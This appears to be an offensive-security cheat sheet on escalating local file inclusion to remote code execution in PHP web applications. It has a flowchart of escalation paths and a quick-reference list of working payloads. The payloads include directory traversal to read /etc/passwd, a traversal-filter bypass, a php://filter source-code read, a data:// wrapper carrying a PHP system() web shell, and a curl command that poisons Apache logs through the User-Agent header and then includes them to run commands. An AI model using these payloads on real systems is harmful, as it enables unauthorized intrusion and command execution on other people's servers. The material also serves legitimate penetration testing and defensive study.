LFI to RCE
Escalating LFI to remote code execution
File InclusionTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[LFI Found] --> B{Path to RCE}
B --> C[Log Poisoning]
B --> D[PHP Wrappers]
B --> E[Session Files]
B --> F[/proc/self/environ]
C --> G[Poison Apache/SSH logs]
D --> H[data:// or expect://]
E --> I[PHP session serialization]
G --> J[Include poisoned log]
H --> J
I --> J
J --> K[RCE Achieved]
Quick Reference
LFI
/page?file=../../../../etc/passwd # Basic directory traversal /page?file=....//....//etc/passwd # Bypass traversal filters
Wrappers
php://filter/convert.base64-encode/resource=index.php # Read source code via base64 filter data://text/plain,<?php system($_GET['cmd']);?> # RCE via data wrapper
Log Poisoning
# Poison Apache log curl -H "User-Agent: <?php system($_GET['cmd']);?>" URL # Inject PHP into User-Agent # Include log /page?file=/var/log/apache2/access.log&cmd=id # Include poisoned log file